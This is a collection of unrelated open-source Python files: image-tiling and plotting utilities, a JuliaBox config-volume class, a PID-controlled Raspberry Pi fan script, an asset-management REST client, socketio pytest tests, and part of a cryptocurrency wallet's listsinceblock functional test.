:param img_shape: the original shape of each image
:type tile_shape: tuple; (rows, cols)
:param tile_shape: the number of images to tile (rows, cols)
:param output_pixel_vals: if output should be pixel values (i.e. int8
values) or floats
:param scale_rows_to_unit_interval: if the values need to be scaled before
being plotted to [0, 1] or not
:returns: array suitable for viewing as an image.
(See:`PIL.Image.fromarray`.)
:rtype: a 2-d array with same dtype as X.
"""
assert len(img_shape) == 2
assert len(tile_shape) == 2
assert len(tile_spacing) == 2
# The expression below can be re-written in a more C style as
# follows :
#
# out_shape = [0, 0]
# out_shape[0] = (img_shape[0]+tile_spacing[0])*tile_shape[0] -
# tile_spacing[0]
# out_shape[1] = (img_shape[1]+tile_spacing[1])*tile_shape[1] -
# tile_spacing[1]
out_shape = [(ishp + tsp) * tshp - tsp for ishp, tshp, tsp
in zip(img_shape, tile_shape, tile_spacing)]
if isinstance(X, tuple):
assert len(X) == 4
# Create an output numpy ndarray to store the image
if output_pixel_vals:
out_array = np.zeros(
(out_shape[0], out_shape[1], 4), dtype='uint8')
else:
out_array = np.zeros(
(out_shape[0], out_shape[1], 4), dtype=X.dtype)
# colors default to 0, alpha defaults to 1 (opaque)
if output_pixel_vals:
channel_defaults = [0, 0, 0, 255]
else:
channel_defaults = [0., 0., 0., 1.]
for i in xrange(4):
if X[i] is None:
# if channel is None, fill it with zeros of the correct
# dtype
dt = out_array.dtype
if output_pixel_vals:
dt = 'uint8'
out_array[:, :, i] = np.zeros(out_shape,
dtype=dt) + channel_defaults[i]
else:
# use a recurrent call to compute the channel and store it
# in the output
out_array[:, :, i] = tile_raster_images(
X[i], img_shape, tile_shape, tile_spacing,
scale_rows_to_unit_interval, output_pixel_vals)
return out_array
else:
# if we are dealing with only one channel
H, W = img_shape
Hs, Ws = tile_spacing
# generate a matrix to store the output
dt = X.dtype
if output_pixel_vals:
dt = 'uint8'
out_array = np.zeros(out_shape, dtype=dt)
for tile_row in xrange(tile_shape[0]):
for tile_col in xrange(tile_shape[1]):
if tile_row * tile_shape[1] + tile_col < X.shape[0]:
if scale_rows_to_unit_interval:
# if we should scale values to be between 0 and 1
# do this by calling the `scale_to_unit_interval`
# function
this_img = scale_to_unit_interval(
X[tile_row * tile_shape[1] +
tile_col].reshape(img_shape))
else:
this_img = X[tile_row * tile_shape[1] +
tile_col].reshape(img_shape)
# add the slice to the corresponding position in the
# output array
c = 1
if output_pixel_vals:
c = 255
out_array[
tile_row * (H + Hs):tile_row * (H + Hs) + H,
tile_col * (W + Ws):tile_col * (W + Ws) + W
] \
= this_img * c
return out_array
def dispims_white(invwhitening, M, height, width, border=0, bordercolor=0.0,
layout=None, **kwargs):
""" Display a whole stack (colunmwise) of vectorized matrices. Useful
eg. to display the weights of a neural network layer.
"""
numimages = M.shape[1]
M = np.dot(invwhitening, M)
if layout is None:
n0 = int(np.ceil(np.sqrt(numimages)))
n1 = int(np.ceil(np.sqrt(numimages)))
else:
n0, n1 = layout
im = bordercolor * np.ones(((height + border) * n0 + border,
(width + border) * n1 + border), dtype='<f8')
for i in range(n0):
for j in range(n1):
if i * n1 + j < M.shape[1]:
im[i * (height + border) + border:(i + 1) * (height + border) + border,
j * (width + border) + border:(j + 1) * (width + border) + border] =\
np.vstack((
np.hstack((
np.reshape(M[:, i * n1 + j],
(height, width)),
bordercolor * np.ones((height, border),
dtype=float))),
bordercolor * np.ones((border, width + border),
dtype=float)))
plt.imshow(im, cmap=matplotlib.cm.gray, interpolation='nearest', **kwargs)
def CreateMovie(filename, plotter, numberOfFrames, fps):
for i in range(numberOfFrames):
plotter(i)
fname = '_tmp%05d.png' % i
plt.savefig(fname)
plt.clf()
os.system("convert -delay 20 -loop 0 _tmp*.png " + filename + ".gif")
os.system("rm _tmp*.png")
def dispimsmovie_patchwise(filename, M, inv, patchsize, fps=5, *args,
**kwargs):
numframes = M.shape[0] / inv.shape[1]
n = M.shape[0] / numframes
def plotter(i):
M_ = M[i * n:n * (i + 1)]
M_ = np.dot(inv, M_)
image = tile_raster_images(
M_.T, img_shape=(patchsize, patchsize),
tile_shape=(10, 10), tile_spacing=(1, 1),
scale_rows_to_unit_interval=True, output_pixel_vals=True)
plt.imshow(image, cmap=matplotlib.cm.gray, interpolation='nearest')
plt.axis('off')
CreateMovie(filename, plotter, numframes, fps)
def dispimsmovie(filename, W, filters, nframes, fps=5):
patchsize = np.uint8(np.sqrt(W.shape[0]))
def plotter(i):
dispims_white(W, filters[i * W.shape[1]:(i + 1) * W.shape[1], :], patchsize,
patchsize, 1, bordercolor=filters.mean(),
vmin=filters.min(), vmax=filters.max() * 0.8)
plt.axis('off')
CreateMovie(filename, plotter, nframes, fps)
def visualizefacenet(fname, imgs, patches_left, patches_right,
true_label, predicted_label):
"""Builds a plot of facenet with attention per RNN step and
classification result
"""
nsamples = imgs.shape[0]
nsteps = patches_left.shape[1]
is_correct = true_label == predicted_label
w = nsteps + 2 + (nsteps % 2)
h = nsamples * 2
plt.clf()
plt.gray()
for i in range(nsamples):
plt.subplot(nsamples, w // 2, i * w // 2 + 1)
plt.imshow(imgs[i])
msg = ('Prediction: ' + predicted_label[i] + ' TrueLabel: ' +
true_label[i])
if is_correct[i]:
plt.title(msg, color='green')
else:
plt.title(msg, color='red')
plt.axis('off')
for j in range(nsteps):
plt.subplot(h, w, i * 2 * w + 2 + 1 + j)
plt.imshow(patches_left[i, j])
plt.axis('off')
plt.subplot(h, w, i * 2 * w + 2 + 1 + j + w)
plt.imshow(patches_right[i, j])
plt.axis('off')
plt.show()
plt.savefig(fname)
if __name__ == '__main__':
from scipy.misc import lena
imgs = lena()[None, ...].repeat(3, axis=0)
patches_left = lena()[None, None, :256].repeat(3, axis=0).repeat(5, axis=1)
patches_right = lena()[None, None, 256:].repeat(
3, axis=0).repeat(5, axis=1)
true_label = np.array(['angry', 'angry', 'sad'])
predicted_label = np.array(['sad'] * 3)
visualizefacenet('lena.pdf', imgs, patches_left, patches_right,
true_label, predicted_label)
# vim: set ts=4 sw=4 sts=4 expandtab:
|
the-stack_0_25906
|
import os
from juliabox.jbox_util import ensure_delete, make_sure_path_exists, unique_sessname, JBoxCfg
from juliabox.vol import JBoxVol
class JBoxDefaultConfigVol(JBoxVol):
provides = [JBoxVol.JBP_CONFIG]
FS_LOC = None
@staticmethod
def configure():
cfg_location = os.path.expanduser(JBoxCfg.get('cfg_location'))
make_sure_path_exists(cfg_location)
JBoxDefaultConfigVol.FS_LOC = cfg_location
@staticmethod
def _get_config_mounts_used(cid):
used = []
props = JBoxDefaultConfigVol.dckr().inspect_container(cid)
try:
for _cpath, hpath in JBoxVol.extract_mounts(props):
if hpath.startswith(JBoxDefaultConfigVol.FS_LOC):
used.append(hpath.split('/')[-1])
except:
JBoxDefaultConfigVol.log_error("error finding config mount points used in " + cid)
return []
return used
@staticmethod
def refresh_disk_use_status(container_id_list=None):
pass
@staticmethod
def get_disk_for_user(user_email):
JBoxDefaultConfigVol.log_debug("creating configs disk for %s", user_email)
if JBoxDefaultConfigVol.FS_LOC is None:
JBoxDefaultConfigVol.configure()
disk_path = os.path.join(JBoxDefaultConfigVol.FS_LOC, unique_sessname(user_email))
cfgvol = JBoxDefaultConfigVol(disk_path, user_email=user_email)
cfgvol._unpack_config()
return cfgvol
@staticmethod
def is_mount_path(fs_path):
return fs_path.startswith(JBoxDefaultConfigVol.FS_LOC)
@staticmethod
def get_disk_from_container(cid):
mounts_used = JBoxDefaultConfigVol._get_config_mounts_used(cid)
if len(mounts_used) == 0:
return None
mount_used = mounts_used[0]
disk_path = os.path.join(JBoxDefaultConfigVol.FS_LOC, str(mount_used))
container_name = JBoxVol.get_cname(cid)
sessname = container_name[1:]
return JBoxDefaultConfigVol(disk_path, sessname=sessname)
@staticmethod
def refresh_user_home_image():
pass
def release(self, backup=False):
ensure_delete(self.disk_path, include_itself=True)
@staticmethod
def disk_ids_used_pct():
return 0
def _unpack_config(self):
if os.path.exists(self.disk_path):
JBoxDefaultConfigVol.log_debug("Config folder exists %s. Deleting...", self.disk_path)
ensure_delete(self.disk_path, include_itself=True)
JBoxDefaultConfigVol.log_debug("Config folder deleted %s", self.disk_path)
JBoxDefaultConfigVol.log_debug("Will unpack config to %s", self.disk_path)
os.mkdir(self.disk_path)
JBoxDefaultConfigVol.log_debug("Created config folder %s", self.disk_path)
self.restore_user_home(True)
JBoxDefaultConfigVol.log_debug("Restored config files to %s", self.disk_path)
self.setup_instance_config()
JBoxDefaultConfigVol.log_debug("Setup instance config at %s", self.disk_path)
|
the-stack_0_25909
|
#!/usr/bin/python
import sys, getopt, time
import sfan as f
from gpiozero import CPUTemperature
import datetime
class PID:
kp = 1
ki = 0
kd = 0
iSum = 0
iLimHi = 100
iLimLo = 0
lastErr = 0
dTerm = 0
outLimLo = 0
outLimHi = 100
def __init__(self, p, i, d):
self.kp = p
self.ki = i
self.kd = d
    def update(self, err, dt):
        # integral term with anti-windup clamping
        self.iSum += self.ki * err * dt
        if self.iSum > self.iLimHi:
            self.iSum = self.iLimHi
        if self.iSum < self.iLimLo:
            self.iSum = self.iLimLo
        # derivative term (an optional low-pass filter could be added here)
        self.dTerm = self.kd * (err - self.lastErr) / dt
        self.lastErr = err
        # proportional + integral + derivative, clamped to the output limits
        out = self.kp * err + self.iSum + self.dTerm
        if out > self.outLimHi:
            out = self.outLimHi
        if out < self.outLimLo:
            out = self.outLimLo
        return out
def WriteToLog(temperature, fanPower):
f = open("SmartFan.csv", "a")
now = datetime.datetime.now()
f.write(now.strftime("%Y-%m-%d %H:%M:%S") + "," + str(temperature) + "," + str(fanPower) + "\n")
f.close()
def main(argv):
setTemp = 100
verb = False
log = False
logInt = 60
try:
        opts, args = getopt.getopt(argv, "ht:vl:", ["help", "temp=", "verbose", "log="])
except getopt.error as err:
# Output error, and return with an error code
print(str(err))
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
print('loop.py -t <temperature> Maintain CPU temperature at set level (deg C)')
sys.exit()
elif opt in ("-v", "--verbose"):
verb = True
elif opt in ("-t", "--temp"):
setTemp = int(arg)
elif opt in ("-l", "--log"):
log = True
if len(arg) > 0:
logInt = int(arg)
if setTemp < 30 or setTemp > 80:
print('Invalid set temperature must be between 30 and 80 deg C!')
sys.exit(3)
cpu = CPUTemperature()
fanPid = PID(10, .8, .1)
logCount = 0
while(1):
time.sleep(1)
t = cpu.temperature
out = int(fanPid.update(t-setTemp, 1))
f.setPower(0, out)
if verb:
#print("CPU temperature:" + str(int(t)) + " FAN power: " + str(int(out)))
sys.stdout.write("CPU temperature: %d FAN power: %d%% \r" % (int(t), int(out)))
sys.stdout.flush()
if log:
            logCount += 1
            if logCount >= logInt:
                logCount = 0
                WriteToLog(t, out)
if __name__ == "__main__":
main(sys.argv[1:])
|
the-stack_0_25910
|
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import Iterable
import json
import logging
from amaascore.assets.utils import json_to_asset
from amaascore.core.interface import Interface
from amaascore.core.amaas_model import json_handler
class AssetsInterface(Interface):
def __init__(
self,
environment=None,
endpoint=None,
logger=None,
username=None,
password=None,
session_token=None,
):
self.logger = logger or logging.getLogger(__name__)
super(AssetsInterface, self).__init__(
endpoint=endpoint,
endpoint_type="assets",
session_token=session_token,
environment=environment,
username=username,
password=password,
)
def new(self, asset):
self.logger.info(
"New Asset - Asset Manager: %s - Asset ID: %s",
asset.asset_manager_id,
asset.asset_id,
)
url = "%s/assets/%s" % (self.endpoint, asset.asset_manager_id)
response = self.session.post(url, json=asset.to_interface())
if response.ok:
self.logger.info(
"Successfully Created Asset - Asset Manager: %s - Asset ID: %s",
asset.asset_manager_id,
asset.asset_id,
)
asset = json_to_asset(response.json())
return asset
else:
self.logger.error(response.text)
response.raise_for_status()
def create_many(self, assets):
if not assets or not isinstance(assets, list):
raise ValueError("Invalid argument. Argument must be a non-empty list.")
self.logger.info("New Assets - Asset Manager: %s", assets[0].asset_manager_id)
url = "%s/assets/%s" % (self.endpoint, assets[0].asset_manager_id)
json_body = [asset.to_interface() for asset in assets]
response = self.session.post(url, json=json_body)
if response.ok:
self.logger.info(
"Successfully Created Assets - Asset Manager: %s",
assets[0].asset_manager_id,
)
assets = [asset for asset in response.json()]
return assets
else:
self.logger.error(response.text)
response.raise_for_status()
def upsert(self, asset):
""" upsert only support upserting one asset at a time"""
self.logger.info(
"Upsert Asset - Asset Manager: %s - Asset ID: %s",
asset.asset_manager_id,
asset.asset_id,
)
url = "%s/assets/%s" % (self.endpoint, asset.asset_manager_id)
response = self.session.post(
url, json=asset.to_interface(), params={"upsert": True}
)
if response.ok:
self.logger.info(
"Successfully Upserted Asset - Asset Manager: %s - Asset ID: %s",
asset.asset_manager_id,
asset.asset_id,
)
asset = json_to_asset(response.json())
return asset
else:
self.logger.error(response.text)
response.raise_for_status()
def amend(self, asset):
self.logger.info(
"Amend Asset - Asset Manager: %s - Asset ID: %s",
asset.asset_manager_id,
asset.asset_id,
)
url = "%s/assets/%s/%s" % (
self.endpoint,
asset.asset_manager_id,
asset.asset_id,
)
response = self.session.put(url, json=asset.to_interface())
if response.ok:
self.logger.info(
"Successfully Amended Asset - Asset Manager: %s - Asset ID: %s",
asset.asset_manager_id,
asset.asset_id,
)
asset = json_to_asset(response.json())
return asset
else:
self.logger.error(response.text)
response.raise_for_status()
def partial(self, asset_manager_id, asset_id, updates):
self.logger.info(
"Partial Amend Asset - Asset Manager: %s - Asset ID: %s",
asset_manager_id,
asset_id,
)
url = "%s/assets/%s/%s" % (self.endpoint, asset_manager_id, asset_id)
# Setting handler ourselves so we can be sure Decimals work
response = self.session.patch(
url,
data=json.dumps(updates, default=json_handler),
headers=self.json_header,
)
if response.ok:
asset = json_to_asset(response.json())
return asset
else:
self.logger.error(response.text)
response.raise_for_status()
def retrieve(self, asset_manager_id, asset_id, version=None):
self.logger.info(
"Retrieve Asset - Asset Manager: %s - Asset ID: %s",
asset_manager_id,
asset_id,
)
url = "%s/assets/%s/%s" % (self.endpoint, asset_manager_id, asset_id)
if version:
url += "?version=%d" % int(version)
response = self.session.get(url)
if response.ok:
self.logger.info(
"Successfully Retrieved Asset - Asset Manager: %s - Asset ID: %s",
asset_manager_id,
asset_id,
)
return json_to_asset(response.json())
else:
self.logger.error(response.text)
response.raise_for_status()
def deactivate(self, asset_manager_id, asset_id):
self.logger.info(
"Deactivate Asset - Asset Manager: %s - Asset ID: %s",
asset_manager_id,
asset_id,
)
url = "%s/assets/%s/%s" % (self.endpoint, asset_manager_id, asset_id)
json = {"asset_status": "Inactive"}
response = self.session.patch(url, json=json)
if response.ok:
self.logger.info(
"Successfully Deactivated Asset - Asset Manager: %s - Asset ID: %s",
asset_manager_id,
asset_id,
)
return json_to_asset(response.json())
else:
self.logger.error(response.text)
response.raise_for_status()
def loose_search(self, asset_manager_id, query="", **kwargs):
"""
Asset search API.
Possible kwargs:
* threshold: int (default = 0)
* page_no: int (default = 1)
* page_size: int (default = 100)
* sort_fields: list (default = [])
* asset_types: list (default = [])
* include_public: bool (default = True)
* include_data_sources: bool (default = True)
"""
self.logger.info("Asset Search - Asset Manager: %s", asset_manager_id)
url = "{endpoint}/assets/search/{asset_manager_id}".format(
asset_manager_id=asset_manager_id,
endpoint=self.endpoint,
)
params = {"query": query}
for k, v in kwargs.items():
if not isinstance(v, str) and isinstance(v, Iterable):
v = ",".join(str(i) for i in v)
params[k] = v
response = self.session.get(url, params=params)
if response.ok:
data = response.json()
assets = [json_to_asset(json_asset) for json_asset in data.get("hits", [])]
self.logger.info("Returned %s Assets.", len(assets))
return assets
else:
self.logger.error(response.text)
response.raise_for_status()
def search(self, asset_manager_id, **kwargs):
"""
Search for assets.
Possible kwargs:
* client_ids: list[int]
* asset_statuses: list
* asset_ids: list
* reference_types: list
* reference_values: list
* asset_issuer_ids: list[int]
* asset_classes: list
* asset_types: list
* country_ids: list
* currencies: list
* include_public: bool (default = True)
* include_data_sources: bool (default = True)
        * page_no: int (default = 1)
        * page_size: int (default = 100)
"""
self.logger.info("Search for Assets - Asset Manager: %s", asset_manager_id)
search_params = {}
for k, v in kwargs.items():
if not isinstance(v, str) and isinstance(v, Iterable):
v = ",".join(str(i) for i in v)
search_params[k] = v
url = "%s/assets/%s" % (self.endpoint, asset_manager_id)
response = self.session.get(url, params=search_params)
if response.ok:
return response.json() # Temporary hack since json won't map properly
assets = [json_to_asset(json_asset) for json_asset in response.json()]
self.logger.info("Returned %s Assets.", len(assets))
return assets
else:
self.logger.error(response.text)
response.raise_for_status()
def fields_search(
self,
asset_manager_id,
asset_ids=None,
asset_classes=None,
asset_types=None,
fields=None,
page_no=None,
page_size=None,
):
self.logger.info("Search for Assets - Asset Manager: %s", asset_manager_id)
search_params = {}
if asset_ids:
search_params["asset_ids"] = ",".join(asset_ids)
if asset_classes:
search_params["asset_classes"] = ",".join(asset_classes)
if asset_types:
search_params["asset_types"] = ",".join(asset_types)
if fields:
search_params["fields"] = ",".join(fields)
if page_no is not None:
search_params["page_no"] = page_no
if page_size:
search_params["page_size"] = page_size
url = "%s/assets/%s" % (self.endpoint, asset_manager_id)
response = self.session.get(url, params=search_params)
if response.ok:
asset_dicts = response.json()
self.logger.info("Returned %s Assets.", len(asset_dicts))
return asset_dicts
else:
self.logger.error(response.text)
response.raise_for_status()
def assets_by_asset_manager(self, asset_manager_id):
self.logger.info("Retrieve Assets By Asset Manager: %s", asset_manager_id)
url = "%s/assets/%s" % (self.endpoint, asset_manager_id)
response = self.session.get(url)
if response.ok:
assets = [json_to_asset(json_asset) for json_asset in response.json()]
self.logger.info("Returned %s Assets.", len(assets))
return assets
else:
self.logger.error(response.text)
response.raise_for_status()
def assets_lifecycle(self, asset_manager_id, business_date, asset_ids):
self.logger.info(
"Retrieve Assets Lifecycle. Asset Manager: %s", asset_manager_id
)
url = "%s/asset-lifecycle/%s" % (self.endpoint, asset_manager_id)
params = {
"business_date": business_date.isoformat(),
"asset_ids": ",".join(asset_ids),
}
response = self.session.get(url, params=params)
if response.ok:
asset_lifecycles = response.json()
self.logger.info("Returned %s Asset Lifecycles.", len(asset_lifecycles))
return asset_lifecycles
else:
self.logger.error(response.text)
response.raise_for_status()
def clear(self, asset_manager_id):
"""This method deletes all the data for an asset_manager_id.
It should be used with extreme caution. In production it
is almost always better to Inactivate rather than delete."""
self.logger.info("Clear Assets - Asset Manager: %s", asset_manager_id)
url = "%s/clear/%s" % (self.endpoint, asset_manager_id)
response = self.session.delete(url)
if response.ok:
count = response.json().get("count", "Unknown")
self.logger.info("Deleted %s Assets.", count)
return count
else:
self.logger.error(response.text)
response.raise_for_status()
def synch(self, asset_manager_id, **params):
"""
This method invokes a request to synch the assets in
dynamodb and/or elastic search with the SQL assets.
Args:
asset_manager_id (int): The id of the asset manager that owns the assets to be synched
cache (bool): Whether to synch the assets in DynamoDB
search (bool): Whether to synch the assets in Elasticsearch
page_no (int): The current page of assets to be synched.
page_size (int): The number of assets to be synched per request.
Returns:
int: the number of assets synched.
"""
self.logger.info("Synching Assets.")
url = "%s/synch/%s" % (self.endpoint, asset_manager_id)
response = self.session.put(url, params=params)
if response.ok:
count = response.json().get("count", 0)
self.logger.info("Synched %s Assets.", count)
return count
else:
self.logger.error(response.text)
response.raise_for_status()
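# Example usage (illustrative only, not part of the original module). The
# environment name, credentials and asset_manager_id below are placeholders;
# real calls require a reachable AMaaS endpoint:
#
#   interface = AssetsInterface(environment="staging",
#                               username="example-user",
#                               password="example-password")
#   assets = interface.search(asset_manager_id=1, asset_classes=["Equity"])
#   asset = interface.retrieve(asset_manager_id=1, asset_id="SOME_ASSET_ID")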
|
the-stack_0_25912
|
from main import app, socketio, db
from flask import jsonify
from datetime import datetime
from dateutil import parser
class TestMain:
""" Tests for main.py. To run tests navigate to the 'back-end' directory and run: '$pytest' """
def get_test_client(self):
""" returns a socketio test client for the tests to use """
flask_test_client = app.test_client()
socketio_test_client = socketio.test_client(
app, flask_test_client=flask_test_client
)
return socketio_test_client
def wipe_db(self):
""" empties the db """
db.drop_all()
db.create_all()
def fill_db(self):
""" fills the db with test equations """
self.wipe_db()
socketio_test_client = self.get_test_client()
for i in range(25):
equation = f"{i} + {i}"
result = f"{i+i}"
socketio_test_client.emit(
"equation_added", {"equation": equation, "result": result}
)
def test_initial_fetch_empty(self):
""" tests that the initial equation fetch for an empty db """
self.wipe_db()
        socketio_test_client = self.get_test_client()
# make sure the connection gets established
assert socketio_test_client.is_connected()
# check that empty db returns nothing on initial connection
initial_fetch_empty = socketio_test_client.get_received()
initial_fetch_empty_payload = initial_fetch_empty.pop()["args"][0]
assert len(initial_fetch_empty_payload["equations"]) == 0
def test_insert_equations(self):
""" Tests the validity of inserted and then broadcasted equation data agains the origional data """
socketio_test_client = self.get_test_client()
self.wipe_db()
# add 25 equations to the db and check that server broadcasts its payload with id and timestamp back
for i in range(25):
equation = f"{i} + {i}"
result = f"{i+i}"
socketio_test_client.emit(
"equation_added", {"equation": equation, "result": result}
)
# get rebroadcasted payload
inserted = socketio_test_client.get_received()
inserted_payload = inserted.pop()["args"][0]
# validate payload
assert inserted_payload is not None
assert inserted_payload["id"] == i + 1
assert inserted_payload["equation"] == equation
assert inserted_payload["result"] == result
# check that timestamp is no more than 10 seconds old
date_string = inserted_payload["date_created"]
            date_obj = parser.parse(date_string)
delta = (datetime.utcnow() - date_obj).total_seconds()
assert delta < 5
def test_initial_fetch_full(self):
""" Tests that the initial fetch on a db with more than 10 entries returns no more than 10 equations """
self.fill_db()
socketio_test_client = self.get_test_client()
# test that initial fetch returns no more than 10 equations despite 25 being in the db
assert socketio_test_client.is_connected()
        # only 10 equations should come back
initial_fetch_full = socketio_test_client.get_received()
initial_fetch_full_payload = initial_fetch_full.pop()["args"][0]
assert len(initial_fetch_full_payload["equations"]) == 10
# end tests
socketio_test_client.disconnect()
# useful for debugging tests
if __name__ == "__main__":
    test_class = TestMain()
test_class.test_initial_fetch_empty()
test_class.test_insert_equations()
test_class.test_initial_fetch_full()
|
the-stack_0_25914
|
#!/usr/bin/env python3
# Copyright (c) 2017-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the listsinceblock RPC."""
from test_framework.address import key_to_p2wpkh
from test_framework.key import ECKey
from test_framework.test_framework import RuvchainTestFramework
from test_framework.messages import BIP125_SEQUENCE_NUMBER
from test_framework.util import (
assert_array_result,
assert_equal,
assert_raises_rpc_error,
)
from test_framework.wallet_util import bytes_to_wif
from decimal import Decimal
class ListSinceBlockTest(RuvchainTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = True
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
# All nodes are in IBD from genesis, so they'll need the miner (node2) to be an outbound connection, or have
# only one connection. (See fPreferredDownload in net_processing)
self.connect_nodes(1, 2)
self.nodes[2].generate(101)
self.sync_all()
self.test_no_blockhash()
self.test_invalid_blockhash()
self.test_reorg()
self.test_double_spend()
self.test_double_send()
self.double_spends_filtered()
self.test_targetconfirmations()
def test_no_blockhash(self):
self.log.info("Test no blockhash")
txid = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), 1)
blockhash, = self.nodes[2].generate(1)
blockheight = self.nodes[2].getblockheader(blockhash)['height']
self.sync_all()
txs = self.nodes[0].listtransactions()
assert_array_result(txs, {"txid": txid}, {
"category": "receive",
"amount": 1,
"blockhash": blockhash,
"blockheight": blockheight,
"confirmations": 1,
})
assert_equal(
self.nodes[0].listsinceblock(),
{"lastblock": blockhash,
"removed": [],
"transactions": txs})
assert_equal(
self.nodes[0].listsinceblock(""),
{"lastblock": blockhash,
"removed": [],
"transactions": txs})
def test_invalid_blockhash(self):
self.log.info("Test invalid blockhash")
assert_raises_rpc_error(-5, "Block not found", self.nodes[0].listsinceblock,
"42759cde25462784395a337460bde75f58e73d3f08bd31fdc3507cbac856a2c4")
assert_raises_rpc_error(-5, "Block not found", self.nodes[0].listsinceblock,
"0000000000000000000000000000000000000000000000000000000000000000")
assert_raises_rpc_error(-8, "blockhash must be of length 64 (not 11, for 'invalid-hex')", self.nodes[0].listsinceblock,
"invalid-hex")
assert_raises_rpc_error(-8, "blockhash must be hexadecimal string (not 'Z000000000000000000000000000000000000000000000000000000000000000')", self.nodes[0].listsinceblock,
"Z000000000000000000000000000000000000000000000000000000000000000")
def test_targetconfirmations(self):
'''
This tests when the value of target_confirmations exceeds the number of
blocks in the main chain. In this case, the genesis block hash should be
given for the `lastblock` property. If target_confirmations is < 1, then
a -8 invalid parameter error is thrown.
'''
self.log.info("Test target_confirmations")
blockhash, = self.nodes[2].generate(1)
blockheight = self.nodes[2].getblockheader(blockhash)['height']
self.sync_all()
assert_equal(
self.nodes[0].getblockhash(0),
self.nodes[0].listsinceblock(blockhash, blockheight + 1)['lastblock'])
assert_equal(
self.nodes[0].getblockhash(0),
self.nodes[0].listsinceblock(blockhash, blockheight + 1000)['lastblock'])
assert_raises_rpc_error(-8, "Invalid parameter",
self.nodes[0].listsinceblock, blockhash, 0)
def test_reorg(self):
'''
`listsinceblock` did not behave correctly when handed a block that was
no longer in the main chain:
ab0
/ \
aa1 [tx0] bb1
| |
aa2 bb2
| |
aa3 bb3
|
bb4
Consider a client that has only seen block `aa3` above. It asks the node
to `listsinceblock aa3`. But at some point prior the main chain switched
to the bb chain.
Previously: listsinceblock would find height=4 for block aa3 and compare
this to height=5 for the tip of the chain (bb4). It would then return
results restricted to bb3-bb4.
Now: listsinceblock finds the fork at ab0 and returns results in the
range bb1-bb4.
This test only checks that [tx0] is present.
'''
self.log.info("Test reorg")
# Split network into two
self.split_network()
# send to nodes[0] from nodes[2]
senttx = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), 1)
# generate on both sides
nodes1_last_blockhash = self.nodes[1].generate(6)[-1]
nodes2_first_blockhash = self.nodes[2].generate(7)[0]
self.log.debug("nodes[1] last blockhash = {}".format(nodes1_last_blockhash))
self.log.debug("nodes[2] first blockhash = {}".format(nodes2_first_blockhash))
self.sync_all(self.nodes[:2])
self.sync_all(self.nodes[2:])
self.join_network()
# listsinceblock(nodes1_last_blockhash) should now include tx as seen from nodes[0]
# and return the block height which listsinceblock now exposes since a5e7795.
transactions = self.nodes[0].listsinceblock(nodes1_last_blockhash)['transactions']
found = next(tx for tx in transactions if tx['txid'] == senttx)
assert_equal(found['blockheight'], self.nodes[0].getblockheader(nodes2_first_blockhash)['height'])
def test_double_spend(self):
'''
This tests the case where the same UTXO is spent twice on two separate
blocks as part of a reorg.
ab0
/ \
aa1 [tx1] bb1 [tx2]
| |
aa2 bb2
| |
aa3 bb3
|
bb4
Problematic case:
1. User 1 receives RUV in tx1 from utxo1 in block aa1.
2. User 2 receives RUV in tx2 from utxo1 (same) in block bb1
3. User 1 sees 2 confirmations at block aa3.
4. Reorg into bb chain.
5. User 1 asks `listsinceblock aa3` and does not see that tx1 is now
invalidated.
Currently the solution to this is to detect that a reorg'd block is
asked for in listsinceblock, and to iterate back over existing blocks up
until the fork point, and to include all transactions that relate to the
node wallet.
'''
self.log.info("Test double spend")
self.sync_all()
# share utxo between nodes[1] and nodes[2]
eckey = ECKey()
eckey.generate()
privkey = bytes_to_wif(eckey.get_bytes())
address = key_to_p2wpkh(eckey.get_pubkey().get_bytes())
self.nodes[2].sendtoaddress(address, 10)
self.nodes[2].generate(6)
self.sync_all()
self.nodes[2].importprivkey(privkey)
utxos = self.nodes[2].listunspent()
utxo = [u for u in utxos if u["address"] == address][0]
self.nodes[1].importprivkey(privkey)
# Split network into two
self.split_network()
# send from nodes[1] using utxo to nodes[0]
change = '%.8f' % (float(utxo['amount']) - 1.0003)
recipient_dict = {
self.nodes[0].getnewaddress(): 1,
self.nodes[1].getnewaddress(): change,
}
utxo_dicts = [{
'txid': utxo['txid'],
'vout': utxo['vout'],
}]
txid1 = self.nodes[1].sendrawtransaction(
self.nodes[1].signrawtransactionwithwallet(
self.nodes[1].createrawtransaction(utxo_dicts, recipient_dict))['hex'])
# send from nodes[2] using utxo to nodes[3]
recipient_dict2 = {
self.nodes[3].getnewaddress(): 1,
self.nodes[2].getnewaddress(): change,
}
self.nodes[2].sendrawtransaction(
self.nodes[2].signrawtransactionwithwallet(
self.nodes[2].createrawtransaction(utxo_dicts, recipient_dict2))['hex'])
# generate on both sides
lastblockhash = self.nodes[1].generate(3)[2]
self.nodes[2].generate(4)
self.join_network()
self.sync_all()
# gettransaction should work for txid1
assert self.nodes[0].gettransaction(txid1)['txid'] == txid1, "gettransaction failed to find txid1"
# listsinceblock(lastblockhash) should now include txid1, as seen from nodes[0]
lsbres = self.nodes[0].listsinceblock(lastblockhash)
assert any(tx['txid'] == txid1 for tx in lsbres['removed'])
# but it should not include 'removed' if include_removed=false
lsbres2 = self.nodes[0].listsinceblock(blockhash=lastblockhash, include_removed=False)
assert 'removed' not in lsbres2
def test_double_send(self):
'''
This tests the case where the same transaction is submitted twice on two
separate blocks as part of a reorg. The former will vanish and the
latter will appear as the true transaction (with confirmations dropping
as a result).
ab0
/ \
aa1 [tx1] bb1
| |
aa2 bb2
| |
aa3 bb3 [tx1]
|
bb4
Asserted:
1. tx1 is listed in listsinceblock.
2. It is included in 'removed' as it was removed, even though it is now
present in a different block.
3. It is listed with a confirmation count of 2 (bb3, bb4), not
3 (aa1, aa2, aa3).
'''
self.log.info("Test double send")
self.sync_all()
# Split network into two
self.split_network()
# create and sign a transaction
utxos = self.nodes[2].listunspent()
utxo = utxos[0]
change = '%.8f' % (float(utxo['amount']) - 1.0003)
recipient_dict = {
self.nodes[0].getnewaddress(): 1,
self.nodes[2].getnewaddress(): change,
}
utxo_dicts = [{
'txid': utxo['txid'],
'vout': utxo['vout'],
}]
